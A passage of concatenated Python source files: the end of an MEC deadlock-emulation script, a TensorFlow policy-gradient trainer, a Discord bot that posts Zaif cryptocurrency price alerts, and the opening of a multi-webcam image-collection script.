        f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}",
        f"\ntask_received{_id_}_7_{mec_no} = {total_received_task} \nsent_t{_id_}_7_{mec_no} = {clients_record}",
        f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record} "
        f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}",
        f"\noffload_check{_id_}_7_{mec_no} = {offload_check}",
    ]
    path_ = 'data/raw/'
    # Truncate (or create) both output files before appending.
    if os.path.exists(path_):
        cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
        os.system(cmd)
        cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
        os.system(cmd)
    else:
        # NOTE(review): os.mkdir fails if 'data/' itself is missing — confirm
        # the parent directory always exists (os.makedirs would be safer).
        os.mkdir(path_)
        cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
        os.system(cmd)
        cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
        os.system(cmd)
    # Write every line to datap.py via Python and to datal.py via the shell.
    file_ = open(f'{path_}{_id_}_7_{mec_no}datap.py', 'w')
    for i in list_result:
        cmd = f'echo "{i}" >> {path_}{_id_}_7_{mec_no}datal.py'
        file_.write(i)
        os.system(cmd)
    file_.close()
    sp.run(
        ["scp", f"{path_}{_id_}_7_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:/home/mec/result/python"])
    sp.run(
        ["scp", f"{path_}{_id_}_7_{mec_no}datal.py", f"mec@{hosts['osboxes-0']}:/home/mec/result/linux"])
    send_result(hosts['osboxes-0'], list_result)
    send_email(result)
    if len(task_record) > 0:
        # Tell every client about tasks that never came back, tagged with
        # where they were sent ('mec' or 'cloud').
        for _task_ in task_record:
            task_new = '.'.join(_task_.split('.')[:-1])
            _client.publish(task_new.split('.')[2], str({task_new: get_time()+[task_record[_task_]]}), )
    stop += 1  # signal all worker loops to exit
    '''
    for i in thread_record:
        i.join()
    '''
    _client.loop_stop()
    time.sleep(1)
    print('done')
    # Hard exit: the MQTT loop_forever thread would otherwise keep us alive.
    os.system('kill -9 {}'.format(os.getpid()))
def start_loop():
    """Main scheduling loop.

    Waits for task batches queued by the MQTT thread, runs RMS scheduling
    plus wound-wait deadlock resolution to split each batch into local and
    offloaded work, executes the local part, and aborts (saving results)
    after 4 idle minutes or on Ctrl-C.
    """
    global _loc
    global tasks
    global t_time
    global node_id
    global stop
    print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
    node_id = mec_id(ip_address())
    # print('node id: ', node_id)
    _threads_ = [receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
    # Fix: the original set .daemon on one Thread object, then created and
    # started a *different*, non-daemon Thread for the same target. Configure
    # and start the same object so the workers really are daemons.
    for worker in _threads_:
        th = Thread(target=worker)
        th.daemon = True
        th.start()
    x = gp.getpass('Press any key to Start...').lower()
    if x != 'exit':
        print('========= Waiting for tasks ==========')
        _time_ = dt.datetime.now()
        while True:
            try:
                if len(received_task_queue) > 0:
                    info = received_task_queue.pop(0)
                    tasks, t_time = info
                    print('EDF List of Processes: ', tasks, '\n')
                    print('\n========= Running Deadlock Algorithm ===========')
                    lcm_result, task_load = load_tasks()
                    list_seq = get_exec_seq(scheduler(lcm_result, task_load))
                    if len(list_seq) > 0:  # do only when there is a task in safe sequence
                        wait_list = calc_wait_time(list_seq)
                        print('\nWaiting Time List: ', wait_list)
                        compare_result = compare_local_mec(wait_list)
                        print('\nExecute Locally: ', compare_result[1])
                        _loc += len(compare_result[1])  # total number of tasks to be executed locally
                        print('\nExecute in MEC: ', compare_result[0])
                        print('\nSending to cooperative platform')
                        if len(compare_result[0]) > 0:
                            cooperative_mec(compare_result[0])
                        execute(compare_result[1])
                        generate_results()
                        _time_ = dt.datetime.now()  # reset the idle timer
                else:
                    # idle: advertise zero waiting time and check the timeout
                    send_message(str('wt {} 0.0'.format(ip_address())))
                    time.sleep(.4)
                    now = dt.datetime.now()
                    delta = now - _time_
                    if delta > dt.timedelta(minutes=4):
                        # message fixed to match the actual 4-minute timeout
                        # (it previously claimed "5 mins")
                        print('terminating programme 4 mins elapsed')
                        save_and_abort()
                        break
            except KeyboardInterrupt:
                print('\nProgramme Terminated')
                save_and_abort()
                break
def initialization():
    """Prompt for cluster size and cloud IP, start the discovery receiver
    threads, and multicast our 'hello' so peers can register this node."""
    global mec_no
    global host_ip
    global cloud_ip
    host_ip = ip_address()
    try:
        mec_no = int(input('Number of MECs: ').strip())
        cloud_ip = input('Cloud Server IP: ').strip()
        print('\nCompiling MEC Details')
        h1 = Thread(target=receive_message)
        h2 = Thread(target=receive_offloaded_task_mec)
        h1.daemon = True
        h2.daemon = True
        h1.start()
        h2.start()
        while True:
            b = input('Send Hello Message (Y/N): ').strip().lower()
            if b == 'y':
                send_message('hello')
                break
            else:
                print('\nPlease Type "y" to send Hello message\n')
    except KeyboardInterrupt:
        print('\nProgramme Terminated')
        exit(0)
def main():
    """Entry point: set up multicast sockets and host info, then run the emulation."""
    global algo
    os.system('clear')
    print('mec ip: ', ip_address())
    algo = psutil.Process()  # handle used by _memory() to sample this process
    discovering_group()
    offloading_group()
    host_ip_set()
    run_me()


if __name__ == "__main__":
    main()
|
train_pg.py
|
import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
from gym import wrappers
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(
        input_placeholder,
        output_size,
        scope,
        n_layers=2,
        size=64,
        activation=tf.tanh,
        output_activation=None
        ):
    """Build a feedforward network (multilayer perceptron) under `scope`.

    `n_layers` hidden layers of `size` units with `activation`, followed by
    a dense output layer of `output_size` units with `output_activation`
    (None = linear). Returns the output tensor.
    """
    with tf.variable_scope(scope):
        hidden = input_placeholder
        for _layer in range(n_layers):
            hidden = tf.layers.dense(inputs=hidden, units=size, activation=activation)
        return tf.layers.dense(inputs=hidden, units=output_size, activation=output_activation)
def pathlength(path):
    """Number of timesteps in a sampled trajectory (one reward per step)."""
    rewards = path["reward"]
    return len(rewards)
def discounted_rewards_to_go(rewards, gamma):
    """Per-timestep discounted reward-to-go (reward_to_go=True variant).

    Element t equals sum over t' >= t of gamma**(t'-t) * rewards[t'],
    computed in one backward sweep with a running accumulator.
    """
    rtgs = [0.0] * len(rewards)
    running = 0
    for t in range(len(rewards) - 1, -1, -1):
        running = running * gamma + rewards[t]
        rtgs[t] = running
    return rtgs
def sum_discounted_rewards(rewards, gamma):
    """Single discounted return of a whole trajectory (reward_to_go=False):
    sum of gamma**i * rewards[i] over all timesteps i."""
    total = 0
    for i, reward in enumerate(rewards):
        total += (gamma ** i) * reward
    return total
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
             env_name='CartPole-v0',
             n_iter=100,
             gamma=1.0,
             min_timesteps_per_batch=1000,
             max_path_length=None,
             learning_rate=5e-3,
             reward_to_go=True,
             animate=True,
             logdir=None,
             normalize_advantages=True,
             nn_baseline=False,
             seed=0,
             # network arguments
             n_layers=1,
             size=32
             ):
    """Train a vanilla policy-gradient (REINFORCE) agent on a gym environment.

    Builds a TF1 graph for the policy (and optionally a neural-network state
    baseline), then alternates between collecting a batch of on-policy
    rollouts and taking one Adam step on the policy-gradient loss.

    Args:
        exp_name: Experiment name (recorded in the saved params only).
        env_name: Gym environment id to train on.
        n_iter: Number of policy-update iterations.
        gamma: Discount factor for rewards.
        min_timesteps_per_batch: Keep collecting rollouts until the batch
            exceeds this many timesteps.
        max_path_length: Episode step cap; defaults to the env spec's limit.
        learning_rate: Adam learning rate for policy (and baseline) updates.
        reward_to_go: If True, use per-timestep discounted reward-to-go as the
            Q estimate; otherwise repeat the trajectory's discounted return.
        animate: If True, render the first rollout of every 10th iteration.
        logdir: Output directory for logz logs and gym monitor videos.
        normalize_advantages: If True, standardize advantages (mean 0, std 1).
        nn_baseline: If True, fit a neural-network state-value baseline.
        seed: Random seed for TF and numpy.
        n_layers: Hidden layers in the policy (and baseline) MLP.
        size: Units per hidden layer.

    Notation: the sy_ prefix marks symbolic (graph) tensors; suffixes _no /
    _na / _n describe shapes (batch x ob_dim, batch x ac_dim, batch).
    """
    start = time.time()
    # Configure output directory for logging
    logz.configure_output_dir(logdir)
    # Log experimental parameters.
    # NOTE(review): inspect.getargspec is deprecated and removed in
    # Python 3.11; inspect.getfullargspec is the drop-in replacement.
    args = inspect.getargspec(train_PG)[0]
    locals_ = locals()
    params = {k: locals_[k] if k in locals_ else None for k in args}
    logz.save_params(params)
    # Set random seeds
    tf.set_random_seed(seed)
    np.random.seed(seed)
    # Make the gym environment, wrapped with a monitor that records videos
    # and stats into logdir.
    env = gym.make(env_name)
    env = wrappers.Monitor(env, logdir, force=True)
    # Is this env continuous, or discrete?
    discrete = isinstance(env.action_space, gym.spaces.Discrete)
    # Maximum length for episodes
    max_path_length = max_path_length or env.spec.max_episode_steps
    # Observation and action sizes
    ob_dim = env.observation_space.shape[0]
    ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
    # Placeholders for batch observations / actions / advantages, fed each
    # iteration with the data gathered from the rollouts.
    sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
    if discrete:
        sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
    else:
        sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
    # Define a placeholder for advantages
    sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
    # Policy network, stochastic action-sampling op, and the op producing the
    # (negative) log-probability of the actions that were actually taken.
    if discrete:
        # Categorical policy: logits -> multinomial sample. The softmax cross
        # entropy of the taken action IS its negative log-likelihood.
        sy_logits_na = build_mlp(input_placeholder=sy_ob_no, output_size=ac_dim,
                                 scope="discrete_policy_network", n_layers=n_layers, size=size,
                                 activation=tf.nn.relu)
        sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=[1])
        sy_logprob_n = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
    else:
        # Gaussian policy: the network outputs the mean; a single trainable
        # log-std vector is shared across states. Sampling uses the
        # reparameterization trick: mean + std * z, z ~ N(0, I).
        sy_mean = build_mlp(input_placeholder=sy_ob_no, output_size=ac_dim,
                            scope="continuous_policy_network", n_layers=n_layers, size=size,
                            activation=tf.nn.relu)
        # logstd should just be a trainable variable, not a network output.
        sy_logstd = tf.get_variable("logstd", shape=[ac_dim], dtype=tf.float32)
        sy_sampled_ac = tf.random_normal(shape=tf.shape(sy_mean), mean=sy_mean, stddev=tf.exp(sy_logstd))
        dist = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean,
                                                               scale_diag=tf.exp(sy_logstd))
        sy_logprob_n = -dist.log_prob(sy_ac_na)
    # Loss function that we'll differentiate to get the policy gradient:
    # mean over the batch of (negative log-prob * advantage). Minimizing it
    # performs gradient ascent on expected advantage-weighted log-prob.
    loss = tf.reduce_mean(tf.multiply(sy_logprob_n, sy_adv_n))
    update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
    # Optional neural-network baseline predicting (standardized) state values;
    # it is trained in the loop below and its predictions are rescaled to the
    # batch's Q statistics before being subtracted from Q.
    if nn_baseline:
        baseline_prediction = tf.squeeze(build_mlp(
                                sy_ob_no,
                                1,
                                "nn_baseline",
                                n_layers=n_layers,
                                size=size))
        baseline_targets = tf.placeholder(shape=[None], name="baseline_targets", dtype=tf.float32)
        baseline_loss = tf.nn.l2_loss(baseline_prediction - baseline_targets)
        baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(baseline_loss)
    # Tensorflow engineering: config, session, variable initialization.
    tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
    sess = tf.Session(config=tf_config)
    sess.__enter__() # equivalent to `with sess:`
    tf.global_variables_initializer().run() #pylint: disable=E1101
    # Training loop.
    total_timesteps = 0
    for itr in range(n_iter):
        print("********** Iteration %i ************"%itr)
        # Collect paths until we have enough timesteps
        timesteps_this_batch = 0
        paths = []
        while True:
            ob = env.reset()
            obs, acs, rewards = [], [], []
            animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
            steps = 0
            while True:
                if animate_this_episode:
                    env.render()
                    time.sleep(0.05)
                obs.append(ob)
                # Sample one action from the current policy for this state.
                ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
                ac = ac[0]
                acs.append(ac)
                ob, rew, done, _ = env.step(ac)
                rewards.append(rew)
                steps += 1
                if done or steps > max_path_length:
                    break
            path = {"observation" : np.array(obs),
                    "reward" : np.array(rewards),
                    "action" : np.array(acs)}
            paths.append(path)
            timesteps_this_batch += pathlength(path)
            if timesteps_this_batch > min_timesteps_per_batch:
                break
        total_timesteps += timesteps_this_batch
        # Build arrays for observation, action for the policy gradient update
        # by concatenating across paths.
        ob_no = np.concatenate([path["observation"] for path in paths])
        ac_na = np.concatenate([path["action"] for path in paths])
        # Q-value estimates per timestep: either the discounted reward-to-go
        # Q_t = sum_{t'>=t} gamma^(t'-t) r_{t'} (reward_to_go=True), or the
        # trajectory's total discounted return repeated for every step.
        q_n = []
        if reward_to_go:
            q_n = np.concatenate([discounted_rewards_to_go(path["reward"], gamma) for path in paths])
        else:
            q_n = np.concatenate([
                [sum_discounted_rewards(path["reward"], gamma)] * pathlength(path)
                for path in paths])
        # Baseline: predict normalized values, rescale them to this batch's Q
        # statistics, and subtract to obtain advantages.
        if nn_baseline:
            b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no: ob_no})
            b_n = b_n * np.std(q_n, axis=0) + np.mean(q_n, axis=0)
            adv_n = q_n - b_n
        else:
            adv_n = q_n.copy()
        # Advantage normalization: a variance-reduction trick that also keeps
        # the gradient scale roughly constant across iterations.
        if normalize_advantages:
            adv_n = (adv_n - np.mean(adv_n)) / (np.std(adv_n) + 1e-8)
        # Fit the baseline to this batch's standardized Q-values so it can be
        # used for the next iteration.
        if nn_baseline:
            q_n_mean = np.mean(q_n, axis=0)
            q_n_std = np.std(q_n, axis=0)
            q_n = (q_n - q_n_mean) / (q_n_std + 1e-7)
            sess.run(baseline_update_op, feed_dict={sy_ob_no: ob_no, baseline_targets: q_n})
        # Perform the policy gradient update on the collected batch.
        _ = sess.run([update_op], feed_dict={sy_ob_no: ob_no,
                                             sy_ac_na: ac_na,sy_adv_n: adv_n})
        # Log diagnostics
        returns = [path["reward"].sum() for path in paths]
        ep_lengths = [pathlength(path) for path in paths]
        logz.log_tabular("Time", time.time() - start)
        logz.log_tabular("Iteration", itr)
        logz.log_tabular("AverageReturn", np.mean(returns))
        logz.log_tabular("StdReturn", np.std(returns))
        logz.log_tabular("MaxReturn", np.max(returns))
        logz.log_tabular("MinReturn", np.min(returns))
        logz.log_tabular("EpLenMean", np.mean(ep_lengths))
        logz.log_tabular("EpLenStd", np.std(ep_lengths))
        logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
        logz.log_tabular("TimestepsSoFar", total_timesteps)
        logz.dump_tabular()
        logz.pickle_tf_vars()
def main():
    """Parse CLI arguments and launch one training process per experiment seed."""
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('env_name', type=str)
    parser.add_argument('--exp_name', type=str, default='vpg')
    parser.add_argument('--render', action='store_true')
    parser.add_argument('--discount', type=float, default=1.0)
    parser.add_argument('--n_iter', '-n', type=int, default=100)
    parser.add_argument('--batch_size', '-b', type=int, default=1000)
    parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
    parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
    parser.add_argument('--reward_to_go', '-rtg', action='store_true')
    parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
    parser.add_argument('--nn_baseline', '-bl', action='store_true')
    parser.add_argument('--seed', type=int, default=1)
    parser.add_argument('--n_experiments', '-e', type=int, default=1)
    parser.add_argument('--n_layers', '-l', type=int, default=1)
    parser.add_argument('--size', '-s', type=int, default=32)
    args = parser.parse_args()
    # Create a timestamped log directory under ./data for this experiment.
    if not(os.path.exists('data')):
        os.makedirs('data')
    logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
    logdir = os.path.join('data', logdir)
    if not(os.path.exists(logdir)):
        os.makedirs(logdir)
    # ep_len <= 0 means "use the environment's default episode limit".
    max_path_length = args.ep_len if args.ep_len > 0 else None
    for e in range(args.n_experiments):
        # Each experiment gets a distinct, deterministic seed.
        seed = args.seed + 10*e
        print('Running experiment with seed %d'%seed)
        def train_func():
            # Closure over this iteration's seed and the parsed args; runs in
            # a child process (see below).
            train_PG(
                exp_name=args.exp_name,
                env_name=args.env_name,
                n_iter=args.n_iter,
                gamma=args.discount,
                min_timesteps_per_batch=args.batch_size,
                max_path_length=max_path_length,
                learning_rate=args.learning_rate,
                reward_to_go=args.reward_to_go,
                animate=args.render,
                logdir=os.path.join(logdir,'%d'%seed),
                normalize_advantages=not(args.dont_normalize_advantages),
                nn_baseline=args.nn_baseline,
                seed=seed,
                n_layers=args.n_layers,
                size=args.size
                )
        # Awkward hacky process runs, because Tensorflow does not like
        # repeatedly calling train_PG in the same thread.
        p = Process(target=train_func, args=tuple())
        p.start()
        p.join()


if __name__ == "__main__":
    main()
|
bot.py
|
# coding=utf-8
import asyncio
import time
from datetime import datetime
from threading import Thread
from typing import Dict, Optional, Union
import discord
import requests
from colorama import Back
from discord import Game, Embed, Colour, Client, Channel
from .config import Config
from .stream import ZaifStream
from .utils import Utils
# Default HTTP headers sent with every REST request; identifies this bot to
# the Zaif / CoinMarketCap APIs.
httpHeaders: Dict[str, str] = {
    "User-Agent": "Zaifcord 1.0 (https://github.com/SlashNephy/Zaifcord)"
}
class ZaifBot:
    """Discord bot that watches a Zaif currency-pair stream and posts price
    movement notifications to configured text channels.

    NOTE(review): uses the pre-1.0 discord.py API (Channel, purge_from,
    send_typing, send_message, client.servers) — verify against the pinned
    discord.py version before upgrading.
    """

    def __init__(self, config: Config) -> None:
        self.config: Config = config
        # A dedicated event loop; the Discord client runs on a worker thread
        # (see start()/_start()).
        self.loop: asyncio.AbstractEventLoop = asyncio.new_event_loop()
        self.client: Client = Client(loop=self.loop)
        # channelId -> Channel, filled in on_ready.
        self.textChannels: Dict[str, Channel] = {}
        self.zaifStream: ZaifStream = ZaifStream(self.config.currencyPair)
        # Debounce map: "u_<phase>"/"d_<phase>" -> last notification time.
        self.priceHistory: Dict[str, datetime] = {}

    def getTicker(self) -> Optional[Dict]:
        """Fetch the Zaif 24h ticker for the configured pair, or None on error."""
        with requests.get(f"https://api.zaif.jp/api/1/ticker/{self.config.currencyPair}", headers=httpHeaders) as r:
            try:
                return r.json()
            except Exception:
                Utils.printError(f"ティッカーの取得に失敗しました: {self.config.currencyPair}")
                return None

    def getCoinMarketCapApi(self) -> Optional[Dict]:
        """Fetch the CoinMarketCap v1 ticker (JPY-converted), or None.

        Returns None when no CMC id is configured, on an API "error" payload,
        or (implicitly) on a parse failure.
        """
        if not self.config.coinmarketcapId:
            return None
        with requests.get(f"https://api.coinmarketcap.com/v1/ticker/{self.config.coinmarketcapId}/?convert=JPY", headers=httpHeaders) as r:
            try:
                t = r.json()
                return t[0] if "error" not in t else None
            except Exception:
                Utils.printError(f"CoinMarketCapのティッカーの取得に失敗しました: {self.config.currencyPair}")

    @staticmethod
    def formatComma(x: Union[int, float]) -> str:
        """Format a number with thousands separators, e.g. 1234567 -> '1,234,567'."""
        return "{:,}".format(x)

    @staticmethod
    def formatJPY(x: float) -> str:
        """Format a JPY amount using the 億 (1e8) / 万 (1e4) units."""
        x = round(x)
        manUnit, okuUnit = int(1e4), int(1e8)
        oku = x // okuUnit
        x -= okuUnit * oku
        man = x // manUnit
        return f"約{oku}億{man}万円"

    async def sendMessage(self, phase: int, up: bool, price: float) -> None:
        """Post a price-movement embed to every configured channel.

        Args:
            phase: Price bracket (rounded down to 10 JPY) used in the message.
            up: True for an upward move, False for a downward move.
            price: The latest traded price.
        """
        # Debounce: skip if the same direction+phase fired within 3 minutes.
        key: str = f"{'u' if up else 'd'}_{phase}"
        lastTime = self.priceHistory.get(key)
        self.priceHistory[key] = datetime.now()
        if lastTime and (datetime.now() - lastTime).total_seconds() < 180:
            return
        ticker = self.getTicker()
        if not ticker:
            return
        coinmarketcapTicker = self.getCoinMarketCapApi()
        # Choose the headline based on direction and 24h high/low breakout.
        if up:
            if ticker["high"] <= price:
                title = "高値更新中⤴"
            else:
                title = "上昇中⤴"
        else:
            if price <= ticker["low"]:
                title = "安値更新中⤵"
            else:
                title = "下落中⤵"
        # Deviation from the 24h volume-weighted average price, in percent.
        percent = round((price / ticker["vwap"] - 1) * 100, 2)
        embedObject = Embed(
            title=f"{title} ({'+' if percent > 0 else ''}{percent}%)",
            color=Colour(int("88B04B" if up else "FF4444", 16)),
            description=f"{phase}円台に突入しました. 現在 {self.formatComma(price)}JPYです.",
            timestamp=datetime.utcnow(),
        )
        embedObject.set_author(
            name=f"{self.config.name} (Zaif)",
            url=self.config.url
        )
        embedObject.set_footer(
            text=datetime.now().strftime("%Y/%m/%d %H:%M") + " 時点"
        )
        embedObject.add_field(name="24h安値", value=self.formatComma(ticker["low"]))
        embedObject.add_field(name="24h高値", value=self.formatComma(ticker["high"]))
        embedObject.add_field(name="24h加重平均", value=self.formatComma(ticker["vwap"]))
        embedObject.add_field(name="24h出来高", value=self.formatComma(ticker["volume"]))
        if coinmarketcapTicker:
            # Deviation of the Zaif price from the CMC global average price.
            percent = round((price / float(coinmarketcapTicker["price_jpy"]) - 1) * 100, 2)
            embedObject.description += f" 市場平均は {round(float(coinmarketcapTicker['price_jpy']), 2)}JPYで 乖離は{'+' if percent > 0 else ''}{percent}%です."
            if coinmarketcapTicker["market_cap_jpy"]:
                embedObject.add_field(name="時価総額", value=self.formatJPY(float(coinmarketcapTicker["market_cap_jpy"])))
            # NOTE(review): assumes the CMC v1 API returns "rank" as a string
            # (string + string concatenation) — confirm before changing APIs.
            embedObject.add_field(name="ランキング", value=coinmarketcapTicker["rank"] + "位")
        for channel in self.textChannels.values():
            # Clear the bot's previous messages so only the latest remains.
            await self.client.purge_from(channel, check=lambda x: x.author == self.client.user)
            await self.client.send_typing(channel)
            await self.client.send_message(channel, embed=embedObject)
        Utils.printInfo(f"{self.config.name} が {Back.LIGHTRED_EX + '上昇中' if up else Back.LIGHTBLUE_EX + '下落中'}{Back.RESET}です. {phase}円台に突入しました. 現在の価格は {price}JPYです.")

    async def stream(self) -> None:
        """Consume the Zaif websocket stream forever, posting on phase changes.

        Also updates the bot's presence with the current price bracket and
        restarts the stream when it is detected dead.
        """
        self.zaifStream.start()
        phase: Optional[int] = None
        while True:
            try:
                t = self.zaifStream.get()
                if t:
                    price, action = t["last_price"]["price"], "買い" if t["last_price"]["action"] == "ask" else "売り"
                    # Coarse bracket (config.width) drives notifications;
                    # fine bracket (10 JPY) is what gets displayed.
                    latestPhase = int(price // self.config.width) * self.config.width
                    preciseLatestPhase = int(price // 10) * 10
                    if phase and phase != latestPhase:
                        await self.sendMessage(preciseLatestPhase, latestPhase > phase, price)
                    phase = latestPhase
                    await self.client.change_presence(
                        game=Game(
                            name=f"{preciseLatestPhase}円台{'前半' if price - preciseLatestPhase <= 5 else '後半'} (Zaif)"
                        )
                    )
                    if self.config.debug:
                        Utils.printDebug(f"{self.config.name}: {action} {price}JPY")
                if self.zaifStream.isDead():
                    # Replace a dead websocket with a fresh one, then back off.
                    self.zaifStream.kill()
                    self.zaifStream = ZaifStream(self.config.currencyPair)
                    self.zaifStream.start()
                    await asyncio.sleep(10)
                    continue
                await asyncio.sleep(0.5)
            except Exception as e:
                # Keep the stream loop alive on any error.
                print(e)

    def start(self) -> None:
        """Start the Discord client on a background thread."""
        Thread(target=self._start).start()

    def _start(self) -> None:
        """Register event handlers and run the client with auto-reconnect."""
        @self.client.event
        async def on_ready() -> None:
            if len(self.client.servers) == 0:
                Utils.printError("サーバに参加していません. https://discordapi.com/permissions.html などを利用してサーバにBotを追加してください.", critical=True)
            for server in self.client.servers:
                try:
                    await self.client.change_nickname(server.me, self.config.name)
                except discord.errors.Forbidden:
                    # Missing "Change Nickname" permission; not fatal.
                    pass
            for channelId in self.config.textChannelIds:
                self.textChannels[channelId] = self.client.get_channel(channelId)
            Utils.printInfo(f"Discordに接続しました: Bot \"{self.config.name}\"")
            await self.stream()

        @self.client.event
        async def on_error(event, *args, **kwargs) -> None:
            Utils.printError(f"{event} -> {args} + {kwargs}")

        while True:
            try:
                self.client.run(self.config.token)
            except Exception as e:
                Utils.printError(f"Discordとの接続が失われました ({e}). 3秒後に再接続します.")
                time.sleep(3)
|
webcam.py
|
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Collect images from multiple simultaneous webcams.
Usage:
1. Define some environment variables that describe what you're collecting.
dataset=your_dataset_name
mode=train
num_views=2
viddir=/tmp/tcn/videos
tmp_imagedir=/tmp/tcn/tmp_images
debug_vids=1
2. Run the script.
export DISPLAY=:0.0 && \
root=learning/brain/research/tcn && \
bazel build -c opt --copt=-mavx tcn/webcam && \
bazel-bin/tcn/webcam \
--dataset $dataset \
--mode $mode \
--num_views $num_views \
--tmp_imagedir $tmp_imagedir \
--viddir $viddir \
--debug_vids 1 \
--logtostderr
3. Hit Ctrl-C when done collecting, upon which the script will compile videos
for each view and optionally a debug video concatenating multiple
simultaneous views.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
from multiprocessing import Process
import os
import subprocess
import sys
import time
import cv2
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import animation # pylint: disable=g-import-not-at-top
import matplotlib.pyplot as plt
import numpy as np
from six.moves import input
import tensorflow as tf
# Command-line flags controlling dataset naming, webcam count, raw image
# geometry, and output locations for the collection run. Note the debug view
# flags are string-typed.
tf.logging.set_verbosity(tf.logging.INFO)
tf.flags.DEFINE_string('dataset', '', 'Name of the dataset we`re collecting.')
tf.flags.DEFINE_string('mode', '',
                       'What type of data we`re collecting. E.g.:'
                       '`train`,`valid`,`test`, or `demo`')
tf.flags.DEFINE_string('seqname', '',
                       'Name of this sequence. If empty, the script will use'
                       'the name seq_N+1 where seq_N is the latest'
                       'integer-named sequence in the videos directory.')
tf.flags.DEFINE_integer('num_views', 2,
                        'Number of webcams.')
tf.flags.DEFINE_string('tmp_imagedir', '/tmp/tcn/data',
                       'Temporary outdir to write images.')
tf.flags.DEFINE_string('viddir', '/tmp/tcn/videos',
                       'Base directory to write debug videos.')
tf.flags.DEFINE_boolean('debug_vids', True,
                        'Whether to generate debug vids with multiple'
                        'concatenated views.')
tf.flags.DEFINE_string('debug_lhs_view', '0',
                       'Which viewpoint to use for the lhs video.')
tf.flags.DEFINE_string('debug_rhs_view', '1',
                       'Which viewpoint to use for the rhs video.')
tf.flags.DEFINE_integer('height', 1080, 'Raw input height.')
tf.flags.DEFINE_integer('width', 1920, 'Raw input width.')
tf.flags.DEFINE_string('webcam_ports', None,
                       'Comma-separated list of each webcam usb port.')
FLAGS = tf.app.flags.FLAGS
class ImageQueue(object):
    """A process-safe holder for a stream's single most recent image.

    Behaves like a multiprocessing-friendly collections.deque(maxlen=1):
    appending to a full queue discards the stale entry before storing the
    new one.
    """

    def __init__(self):
        self.lock = multiprocessing.Lock()
        self._queue = multiprocessing.Queue(maxsize=1)

    def append(self, data):
        """Replace the queue's contents with `data`, dropping any stale image."""
        with self.lock:
            if self._queue.full():
                # Discard the stale image so the put below cannot block.
                self._queue.get()
            self._queue.put(data)

    def get(self):
        """Remove and return the stored image, blocking until one exists."""
        with self.lock:
            return self._queue.get()

    def empty(self):
        """Return True if no image is currently stored."""
        return self._queue.empty()

    def close(self):
        """Close the underlying multiprocessing queue."""
        return self._queue.close()
class WebcamViewer(object):
    """A class which displays a live stream from the webcams."""

    def __init__(self, display_queues):
        """Create a WebcamViewer instance.

        Args:
            display_queues: A list of ImageQueue, one per webcam view.
        """
        self.height = FLAGS.height
        self.width = FLAGS.width
        self.queues = display_queues

    def _get_next_images(self):
        """Gets the next image to display.

        Busy-waits until every view queue holds an image, then concatenates
        the latest image from each view horizontally into a single frame.
        """
        # Wait for one image per view.
        not_found = True
        combined = None
        while not_found:
            if True in [q.empty() for q in self.queues]:
                # At least one image queue is empty; wait.
                continue
            else:
                # Retrieve the images.
                latest = [q.get() for q in self.queues]
                combined = np.concatenate(latest, axis=1)
                not_found = False
        return combined

    def run(self):
        """Displays the Kcam live stream in a window.

        This function blocks until the window is closed.
        """
        fig, rgb_axis = plt.subplots()
        image_rows = self.height
        image_cols = self.width * FLAGS.num_views
        initial_image = np.zeros((image_rows, image_cols, 3))
        rgb_image = rgb_axis.imshow(initial_image, interpolation='nearest')

        def update_figure(frame_index):
            """Animation function for matplotlib FuncAnimation. Updates the image.

            Args:
                frame_index: The frame number (unused).
            Returns:
                An iterable of matplotlib drawables to clear.
            """
            _ = frame_index
            images = self._get_next_images()
            # Reverse the channel order for display (cv2 captures BGR;
            # matplotlib expects RGB).
            images = images[..., [2, 1, 0]]
            rgb_image.set_array(images)
            return rgb_image,

        # We must keep a reference to this animation in order for it to work.
        unused_animation = animation.FuncAnimation(
